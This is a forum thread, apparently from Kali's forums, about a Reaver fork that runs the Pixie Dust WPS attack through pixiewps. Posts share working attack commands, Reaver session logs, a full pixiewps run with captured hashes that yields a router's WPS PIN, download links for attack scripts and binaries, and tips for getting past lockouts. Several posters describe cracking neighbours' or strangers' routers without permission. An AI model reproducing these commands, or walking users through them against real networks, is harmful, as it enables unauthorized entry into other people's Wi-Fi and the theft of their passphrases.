RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

br-lan Link encap:Ethernet HWaddr F8:1A:67:40:02:31
inet addr:172.25.10.230 Bcast:172.25.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1044 errors:0 dropped:26 overruns:0 frame:0
TX packets:95 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:59454 (58.0 KiB) TX bytes:12990 (12.6 KiB)

br-public Link encap:Ethernet HWaddr F8:1A:67:40:02:31
inet addr:10.10.20.230 Bcast:10.10.20.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1 errors:0 dropped:0 overruns:0 frame:0
TX packets:5 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:46 (46.0 B) TX bytes:402 (402.0 B)

eth0 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:316366 errors:0 dropped:3 overruns:0 frame:0
TX packets:54223 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:69817474 (66.5 MiB) TX bytes:8268306 (7.8 MiB)
Interrupt:5

eth0.1 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
inet addr:169.10.10.254 Bcast:255.255.255.255 Mask:255.255.255.255
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

eth0.2 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1169 errors:0 dropped:1 overruns:0 frame:0
TX packets:96 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:95730 (93.4 KiB) TX bytes:13036 (12.7 KiB)

eth0.3 Link encap:Ethernet HWaddr F8:1A:67:40:02:31
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:46 (46.0 B) TX bytes:448 (448.0 B)

eth1 Link encap:Ethernet HWaddr F8:1A:67:40:02:33
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:4

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:174 errors:0 dropped:0 overruns:0 frame:0
TX packets:174 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:12833 (12.5 KiB) TX bytes:12833 (12.5 KiB)

wlan0 Link encap:Ethernet HWaddr F8:1A:67:40:02:32
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:376 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:32
RX bytes:0 (0.0 B) TX bytes:31239 (30.5 KiB)

wlan0-1 Link encap:Ethernet HWaddr FA:1A:67:40:02:33
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:348 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:32
RX bytes:0 (0.0 B) TX bytes:28963 (28.2 KiB)

wlan0-2 Link encap:Ethernet HWaddr FA:1A:67:40:02:34
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:1 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:32
RX bytes:0 (0.0 B) TX bytes:64 (64.0 B)

This happens sometimes, but it is difficult to create a solution, since each firmware works in a different way.

Why not be something generic is difficult to create a solution.

Any use 4 the -D, --daemonize option of Reaver?

Benefits, specials cases?

Getting the -m error when reaver trys to use pixiewps. That error has been explained as new feature pre release for new version 1.1

I can work around that issue and just hand cut and paste hashes like the old'n days.

But now reaver 1.5.2 downloaded from git today won't associate with even the neighborhood ***** router.
Used aireplay-ng to associate with the router and she dropped her draws. And let me right in there.
Then I used the -A option with reaver and it connected and got hashes but than -m.

I'm I the only one?

Musket Teams have voted to release their Pixie Dust Data Sequence Analyzer PDDSA-01.sh for general use. This script was originally written to work with VMR-MDK009x2.sh a WPS locked intrusion script. But it can work with any text file output from modded reaver programs showing both PKE and PKR.

PDDSA-01.sh simply reads any data output in text format from a modded reaver program, looks for valid Pixie Dust Sequences and extracts the pin using pixiewps. No cut and paste. You can check all the sequences in the file or just one. After the first valid sequence is found the program can cycle thru all the other sequences as required.

If you are not using VMR-MDK009x2 then simply use the command line:

reaver -i mon0 -a -f -c 1 -b 55:44:33:22:11:00 -vv | tee /root/VARMAC_LOGS/targetAP

The reaver command line side can be altered as required however the -vv must remain or no data will be written.

There is a help file in the download.

You can download at two(2) locations

PDDSA-01.sh has been updated to support routers giving altered text output,

You can download PDDSA-02.sh at:

http://www.datafilehost.com/d/e6a13191

or thru aircrack-ng forums see thread

http://forum.aircrack-ng.org/index.php/topic,868.15.html

See thread 21

MTeams

lol @ mmusket33 its soxrok2212 not soxrox2212 or soxorx2212 ( red sox refrence maybe? ;-)), not to be pedantic...

Thanks aanarchyy we will correct that. If you find any bugs in the coding and we will reissue.

MTEAMS

@t6_x

still hoping for a timer function for -g option

-g <sec> # set timeout for chipset recovery...... next up date

Technicolor TD5130

pixiewps -e d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b :1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:4 3:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25: 5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78 :47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2 c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea: 2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f :f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:d b:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61: be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f :18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a 9:e3:b4:22:4f:3d:89:fb:2b -s f4:7b:17:b3:dc:de:29:b2:87:fa:39:ab:66:ce:21:a4:91 :79:93:fc:d1:c5:48:ee:c0:c0:bb:27:4f:fd:ac:95 -z b7:a4:00:05:b2:31:b0:d7:53:96:a7:ce:2c:e0:50:8c:53 :24:e8:66:75:24:7d:32:31:5c:36:ca:54:75:37:50 -r 4f:f3:c0:b0:63:76:0e:1b:8c:22:b4:8f:00:26:0b:fc:ce :84:f5:91:df:46:5a:d0:d7:e6:ec:65:a6:03:56:bb:c1:a 8:10:db:34:7a:c3:29:c5:25:c3:9d:db:93:79:a2:1f:42: 38:64:cf:93:1b:19:49:85:6c:48:2a:6a:88:c1:25:09:58 :6e:2d:de:c1:a4:f2:5c:78:35:9e:8f:13:cc:81:9f:7f:0 d:0d:7c:43:52:72:f2:b5:08:84:ed:e2:bc:5b:26:32:e7: bb:69:ec:40:2e:42:fc:ff:d8:aa:4c:c8:be:f2:e9:ae:b3 :e8:82:6b:0e:1e:3e:fd:73:47:cb:72:b5:0e:f6:b4:ff:2 8:e4:67:8c:9d:2f:08:ee:d8:09:ab:0c:3f:02:44:73:72: 93:35:70:6b:7f:8d:3f:8e:cc:f1:9d:51:40:42:1d:66:d7 :d7:ee:61:9c:58:cc:2c:7b:0e:a4:64:b9:59:6a:76:e5:2 1:37:38:cb:b7:5c:1b:4d:36 -n 71:31:e9:e7:7b:a6:c7:f0:2d:6d:ac:d3:1e:fc:7b:1d -a a0:68:dd:b2:e5:5f:6e:55:54:37:b2:3b:71:cf:d5:a3:5b :14:15:23:49:33:77:17:79:f0:f4:cf:19:e1:09:1e -m f2:6c:ab:f5:0d:8f:a8:cf:f4:ab:9a:27:36:04:a4:3e -b 00:18:E7:******** -v 3 -f 4

Pixiewps 1.1

PRNG Seed: 1317453909 (Sat Oct 1 07:25:09 2011)
PSK1: a6:6e:0e:6f:44:2c:6d:cf:ef:21:69:c0:55:e4:72:b7
PSK2: 73:87:3a:a1:84:e1:3a:30:fe:87:0c:93:fa:4e:f0:52
E-S1: 1f:46:23:13:30:c3:a1:3d:54:74:c5:7e:48:35:8a:41
E-S2: 1f:46:23:13:30:c3:a1:3d:54:74:c5:7e:48:35:8a:41
[+] WPS pin: 65056851

Time taken: 695 s

@popthattif please, what command in reaver did you use to get the 00:18:E7 ? Did it work on the 18:17:25 too ? I tried everything and nothing seems to work.

Hi thanks I just wanted to mention that after running apt-get dist-upgrade. It no longer work.
After attempting different steps to try to fix it. the only that did it was to

#apt-get purge libpcap-dev aircrack-ng sqlite3 libsqlite3-dev

then
#apt-get install libpcap-dev aircrack-ng sqlite3 libsqlite3-dev

recompiling reaver and installing it again.
dunno if it was just me. But I was using a VM with 1.12 and my notebook aswell. After upgrading Kali, it no longer worked. Same problem on both. But is finally solved.

Heard there may b a video tutorial soon, showing Howto use new pixiewps 1.1 with reaver??

Also wondering if there are any plans to have reaver once again automatically use all necessary attacks in updated pixie??

For what its worth, this version of reaver, is now the default version in the main kali repo.
More information:
+ http://git.kali.org/gitweb/?p=packages/reaver.git;a=summary
+ https://www.kali.org/penetration-testing/pixiewps-reaver-aircrack-ng-updates/

Congrats!

Could these guys have a dedicated R&D forum section maybe? Feels like walking on eggshells whenever discussing R&D.

Heard there may b a video tutorial soon, showing Howto use new pixiewps 1.1 with reaver??

Also wondering if there are any plans to have reaver once again automatically use all necessary attacks in updated pixie??



We are working on it.

I'm a little overworked, but I will make the necessary updates.


I'm sorry for the delay in updates these past few weeks, I'm full of work.

@t6x
Appreciate the hard work......for free even. We all are grateful u stepped up and updated reaver with pixie.

@t6x
Appreciate the hard work......for free even. We all are grateful u stepped up and updated reaver with pixie.

if some tests I'm doing work, we will have some news in a few weeks

:)

If u need hash collection or beta test, I'm available

If u need hash collection or beta test, I'm available

With my limited time today, I'll try to look at that Greenwave data you sent me :D

AND can you get me a beacon frame from it?

With my limited time today, I'll try to look at that Greenwave data you sent me :D

AND can you get me a beacon frame from it?

should be a beacon frame in the greenwave cap file i posted
http://d-h.st/9dE1

should be a beacon frame in the greenwave cap file i posted
http://d-h.st/9dE1

Ah, I think I passed right over that, thanks. I'm moving over to the original pixie dust thread because this doesn't really pertain to Reaver...

Already has a new update on github.

Was already using the new pixiewps, the Wiire had upgraded the reaver to work, now I made some adjustments to post a little more automated.

I improved the code too

Already has a new update on github.

Bug fixes

Hey,
i tried to test forked reaver & Pixiewps on supposedly invulnerable "D-Link RTL 8671 EV 2006 27 07 (Realtek)".

1. used reaver -i mon0 - bssid -v -K 1 (didn't used -S, as its a realtek chip)
got all the arguments for pixiewps
Result Found as...
a. No WPS pin found
b. WPS Pin= 12345670 (When used -f argument with pixiewps)


2. Now tried to use WPS Generator

3 pin spurted out. When tried to use to to find passphrase. Reaver never proceeds further.

Which Pin is correct? When i use --pin in reaver. Reaver is just stucks in loops and then gets locked out after 10 tries.

https://forums.kali.org/showthread.php?25123-Reaver-modfication-for-Pixie-Dust-Attack/page5

Read the page 5 for pin generator

Thanks for the reply :) Got the logic. Apparently None of the 3 Pins was correct. All tries led to LockOut. PixieWPS also not working on RTL8671. Normal Reaver attack stops @11th pin, and after that "25 Successive Start Failures". Is RTL8671 Un-hackable? ***i am going to lose the bet** :(

Thanks for the reply :) Got the logic. Apparently None of the 3 Pins was correct. All tries led to LockOut. PixieWPS also not working on RTL8671. Normal Reaver attack stops @11th pin, and after that "25 Successive Start Failures". Is RTL8671 Un-hackable? ***i am going to lose the bet** :(

The RTL8671 is certainly different. It is a SoC (System on Chip) which means pretty much everything is done on that chip... different than your average AP. SoC are generally found in DSL+Cable+Fiber/Router combo devices which leads me to think that they use a different PRNG.

The good news: When I first noticed the static E-Nonce on Realtek devices it kinda told me that their implementation was insecure. Again, seeing a strange nonce following the XX:XX:00:00 pattern, it leads me to think their implementation here is broken also. Wiire and I are looking at it and if we can't find anything, I'll talk with Dominique Bongard. All great people to work with and I love having the pleasure of being able to :)

--I will move to the Pixie Dust thread since this is does not pertain to Reaver

Hi guys,

First, thank you very much for coming up and posting this great idea.

I'm having a difficulty with Reaver. Basically, it won't return the E-Nonce, PKE, manufacturer, model number, etc. The output is exactly like "regular" Reaver.
I was looking for posts with the same problem, but haven't found... which is also weird... What am I doing wrong? I installed Reaver and Pixie exactly like the instructions, and even re-installed just to be sure.

This is the output I get:



> reaver -i wlan1mon -c 6 -b 04:**:**:**:**:** -vv -S

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] Switching wlan1mon to channel 6
[+] Waiting for beacon from 04:**:**:**:**:**
[+] Associated with 04:**:**:**:**:** (ESSID: *****)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 1
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 2
[+] Pin count advanced: 2. Max pin attempts: 11000
^C
[+] Session saved.



Any ideas?

Thanks!

Hi guys,

First, thank you very much for coming up and posting this great idea.

I'm having a difficulty with Reaver. Basically, it won't return the E-Nonce, PKE, manufacturer, model number, etc. The output is exactly like "regular" Reaver.
I was looking for posts with the same problem, but haven't found... which is also weird... What am I doing wrong? I installed Reaver and Pixie exactly like the instructions, and even re-installed just to be sure.

This is the output I get:



Any ideas?

Thanks!

Instead of -vv, add -vvv. This was recently changed so if you are not attacking with Pixiewps you won't see all the extra information.

On some Technicolor the modified reaver recovers the pin but not the passphrase it freezes on

[+] Running reaver with the correct pin, wait ...
[+] Cmd : reaver -i wlan1mon -b 18:17:25:xx:xx:xx -c 11 -s y -vv -p xxxxxxxx
[Reaver Test] [+] BSSID: 18:17:25:xx:xx:xx
[Reaver Test] [+] Channel: 11
if such thing happens use bully to recover it
example :
bully -b 18:17:25:XX:xx:xx:xx: -c 11 -B -v 2 -p xxxxxxxx
it worked for me

@Vinit2512 the RTL8671 is hackable (tested)

Instead of -vv, add -vvv. This was recently changed so if you are not attacking with Pixiewps you won't see all the extra information.

Thanks soxrok2212, it worked :)

To soxrok2212

Could you clarify the -vv versus -vvv. We downloaded and installed the latest reaver as of 15 June and we get no difference in output regardless of settings. We get all the Pixiedust data sequences in both cases.

Which variable ie -vv or -vvv is supposed to provide all data?

MTeams

To soxrok2212

Could you clarify the -vv versus -vvv. We downloaded and installed the latest reaver as of 15 June and we get no difference in output regardless of settings. We get all the Pixiedust data sequences in both cases.

Which variable ie -vv or -vvv is supposed to provide all data?

MTeams

Make sure you are actually running the version of reaver you compile...

-vv will give you the standard Reaver 1.4 -vv output, Received M1, Sending M2, etc.

-vvv will print all the pixie dust informations (PKE, PKR, E-Hash1, etc).

hello.

I managed to get 3 pins off 3 different routers but whenever reaver goes into second part of the cracking just hangs at test channel, and I check airodump the router no longer has wps enable/showing like turn off when i got pin.
is there way re-enable? they were on as before I try reaver them.

hello.

I managed to get 3 pins off 3 different routers but whenever reaver goes into second part of the cracking just hangs at test channel, and I check airodump the router no longer has wps enable/showing like turn off when i got pin.
is there way re-enable? they were on as before I try reaver them.

Some manufacturers are now disabling WPS even after 1 failed PIN attempt. You can try using Pixieloop mode (-P) but it may still lock out. What are the make and model of the targets?

Some manufacturers are now disabling WPS even after 1 failed PIN attempt. You can try using Pixieloop mode (-P) but it may still lock out. What are the make and model of the targets?

I cant get chipset on it because on those router as soon reaver cracked the pin they are no longer showing wps enable, and i waited for whole day maybe they will come on again but nope.

Ported to Android!

Will update soon with link to build script on my github.

Binaries of pixiewps and t6x-reaver.

http://www.mediafire.com/download/bwrwn4i1c8p5881/reaver-pixie-android.tar.gz

having problems with the prereqs

oot@kali:~# apt-get install libpcap-dev libssl-dev sqlite3 libsqlite3-dev unzipReading package lists... Done
Building dependency tree
Reading state information... Done
libssl-dev is already the newest version.
unzip is already the newest version.
unzip set to manually installed.
sqlite3 is already the newest version.
sqlite3 set to manually installed.
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:

The following packages have unmet dependencies:
libpcap-dev : Depends: libpcap0.8-dev but it is not going to be installed
libsqlite3-dev : Depends: libsqlite3-0 (= 3.7.16.2-1~bpo70+1) but 3.8.7.1-1+deb8u1 is to be installed
E: Unable to correct problems, you have held broken packages.

what is force mode?
"Try again with --force or with another (newer) set of data"
and how should I use it?

what is force mode?
"Try again with --force or with another (newer) set of data"
and how should I use it?

https://github.com/wiire/pixiewps

If the following message is shown:

[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.

then the AP might be vulnerable and Pixiewps should be run again with the same set of data along with the option --force or alternatively with a newer set of data.

Is anyone familiar with reaver's "wps transaction failed (0x04)?" WPS is not locked but I get this error constantly.

Thanks for the hard work with updating reaver with pixiewps, but, I get an error that the wps pin was not found and it doesn't continue. I run revare with "reaver -i wlan0mon -b <bssid> -c 11 -K1 -vvv -S" but any combination will produce the same error.

if you use K1 reaver stop after M3 to try pixiewps. If PIN is not fond launch the attack again without K1 to procede with normal WPS brute force

I have problem with the installation of reaver 1.5 because when i put ./CONFIGURE, it give me ERROR: PCAP LIBRARY NOT FOUND. I tried to install update but nothing to do.

I have problem with the installation of reaver 1.5 because when i put ./CONFIGURE, it give me ERROR: PCAP LIBRARY NOT FOUND. I tried to install update but nothing to do.

Read the dependencies in Reaver's Github. It will tell you everything you need to know.



apt-get update
apt-get install libpcap-dev libssl-dev libsqlite3-dev

This command used to work fine for me, but now every time it just repeatedly says, "Failed to associate.....". Did this stop working for anyone else?

Attacking an RTL8xxx, I am getting lots of "failed to associate"timeout"AP rate limiting - wait 60 seconds" although the pin count rises very slowly. Pixiewps didnt work, are there switches I can use to speed up the process. The 'estimated time' fluctuates between 1 day and 10-14 ?